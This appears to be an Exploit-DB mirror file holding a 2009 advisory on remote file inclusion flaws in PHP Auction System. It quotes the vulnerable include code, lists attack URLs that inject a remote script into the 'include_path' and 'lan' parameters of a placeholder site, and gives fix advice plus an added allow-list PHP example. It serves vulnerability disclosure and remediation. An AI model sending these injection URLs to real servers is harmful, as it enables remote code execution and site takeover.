exploit-db-mirror/platforms/php/webapps/7678.txt
Offensive Security 477bcbdcc0 DB: 2016-03-17
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00


[»]=======================================================================================================[_][-][X]
[»] [»]
[»] PHPAuctionSystem Multiple Remote File Inclusion Vulnerability [»]
[»] [»]
[»] ======= ------d-------m------ ==== ==== [»]
[»] || = | |(o o)| | || || || [»]
[»] || = ||(~)|| || || [»]
[»] ======= /|\ || || [»]
[»]=============================================================================================================[»]
[»] Author : ~darkmasking~ [»]
[»] Date : January, 6th 2009 [»]
[»] Web : https://www.idsafeshield.com [»]
[»] Contact : support[at]idsafeshield[dot]com [»]
[»] Critical Level : Dangerous [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] Affected software description : [»]
[»] Software : PHP Auction System [»]
[»] Vendor : http://www.phpauctions.info/ [»]
[»] Price : $59.99 [»]
[»]=============================================================================================================[»]
[»] [»]
[»] [~] Vulnerable file [»]
[»] [»]
[»] [+] All files below are affected by the "include_path" parameter [»]
[»] [»]
[»] ./includes/settings.inc.php [»]
[»] $password_file = $include_path."passwd.inc.php"; [»]
[»] include($password_file); [»]
[»] include $include_path."fonts.inc.php"; [»]
[»] include $include_path."fontsize.inc.php"; [»]
[»] include($include_path."currency.inc.php"); [»]
[»] include($include_path."errors.inc.php"); [»]
[»] include($include_path."https.inc.php"); [»]
[»] [»]
[»] ./includes/auction_confirmation.inc.php [»]
[»] require("./includes/messages.inc.php"); [»]
[»] [»]
[»] ./includes/converter.inc.php [»]
[»] include($include_path."nusoap.php"); [»]
[»] [»]
[»] ./includes/messages.inc.php [»]
[»] require($include_path.'messages.'.$language.'.inc.php'); [»]
[»] [»]
[»] ./includes/stats.inc.php [»]
[»] include $prefix."includes/useragent.inc.php"; [»]
[»] include $prefix."includes/domains.inc.php"; [»]
[»] [»]
[»] ./includes/useragent.inc.php [»]
[»] include $prefix."includes/browsers.inc.php"; [»]
[»] include $prefix."includes/platforms.inc.php"; [»]
[»] [»]
[»] ./includes/user_confirmation.inc.php [»]
[»] require("./includes/messages.inc.php"); [»]
[»] [»]
[»] [»]
[»] [+] All files below are affected by the "lan" parameter [»]
[»] [»]
[»] ./browse.php [»]
[»] ./search.php [»]
[»] if(!empty($_GET['lan'])) { [»]
[»] $language = $lan; [»]
[»] $_SESSION['language'] = $language; [»]
[»] [»]
[»] #// Set language cookie [»]
[»] setcookie("USERLANGUAGE",$lan,time()+31536000,"/"); [»]
[»] } elseif(empty($_SESSION['language']) && !isset($_COOKIE['USERLANGUAGE'])) { [»]
[»] $language = $SETTINGS['defaultlanguage']; [»]
[»] $_SESSION['language'] = $language; [»]
[»] [»]
[»] #// Set language cookie [»]
[»] setcookie("USERLANGUAGE",$language,time()+31536000); [»]
[»] } elseif(isset($_COOKIE['USERLANGUAGE'])) { [»]
[»] $language = $_COOKIE['USERLANGUAGE']; [»]
[»] } [»]
[»] [»]
[»] require($include_path.'messages.'.$language.'.inc.php'); [»]
[»] [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] Exploit [»]
[»] [»]
[»] [+] "include_path" parameter [»]
[»] [»]
[»] http://www.darkvictims.com/[path]/includes/settings.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/auction_confirmation.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/converter.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/messages.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/stats.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/useragent.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/user_confirmation.inc.php?include_path=[darkcode] [»]
[»] [»]
[»] [»]
[»] [+] "lan" parameter [»]
[»] [»]
[»] http://www.darkvictims.com/[path]/browse.php?lan=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/search.php?lan=[darkcode] [»]
[»] [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] How to fix this vulnerability [»]
[»] [»]
[»] Edit the source code to ensure that input is properly validated. Where possible, [»]
[»] make a list of accepted filenames and restrict the input to that list. [»]
[»] [»]
[»] For PHP, the option allow_url_fopen would normally allow a programmer to open, [»]
[»] include or otherwise use a remote file using a URL rather than a local file path. [»]
[»] It is recommended to disable this option in php.ini. [»]
[»] [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] Greetz [»]
[»] [»]
[»] JUST FOR MYSELF [ Sorry bro, haven't got any friends yet :) ] [»]
[»] [»]
[»] [»]
[»]=============================================================================================================[»]
# milw0rm.com [2009-01-06]
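
The fix described under "How to fix this vulnerability", applied to the language selection shown for browse.php and search.php. This is an added example, not code from PHPAuctionSystem or from the advisory's author. The language codes, the INCLUDE_DIR constant and the function names are assumptions made for illustration. The check of allow_url_include is also an addition: it is the php.ini directive that governs URLs passed to include/require, next to the allow_url_fopen option the advisory names.

```php
<?php
// Added example (not PHPAuctionSystem code). Assumptions: language files are
// ./includes/messages.<LANG>.inc.php and the language codes below are samples.

const INCLUDE_DIR = __DIR__ . '/includes/';   // fixed on the server, never from the request
const ALLOWED_LANGUAGES = ['EN', 'DE', 'ES']; // constructed allow-list

// Return the first request-supplied language that is on the allow-list,
// checking the same three sources the original code reads.
function pick_language(array $get, array $session, array $cookie, string $default): string
{
    $candidates = [$get['lan'] ?? null, $session['language'] ?? null, $cookie['USERLANGUAGE'] ?? null];
    foreach ($candidates as $candidate) {
        if (is_string($candidate) && in_array($candidate, ALLOWED_LANGUAGES, true)) {
            return $candidate;
        }
    }
    return $default;
}

// Build the include target from the fixed directory and a validated code only.
function language_file(string $language): string
{
    if (!in_array($language, ALLOWED_LANGUAGES, true)) {
        throw new InvalidArgumentException('language not on allow-list');
    }
    return INCLUDE_DIR . 'messages.' . $language . '.inc.php';
}

// True when PHP would accept URLs in include/require or in fopen-style calls.
function remote_files_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)
        || filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN);
}

// Constructed request data: the "lan" value is not on the allow-list,
// the cookie value is, so the cookie value is the one selected.
$language = pick_language(['lan' => 'not-a-language'], [], ['USERLANGUAGE' => 'DE'], 'EN');
echo $language, "\n";
echo language_file($language), "\n";

// Deployment check: report whether either remote-file option is still enabled.
var_dump(remote_files_enabled());
```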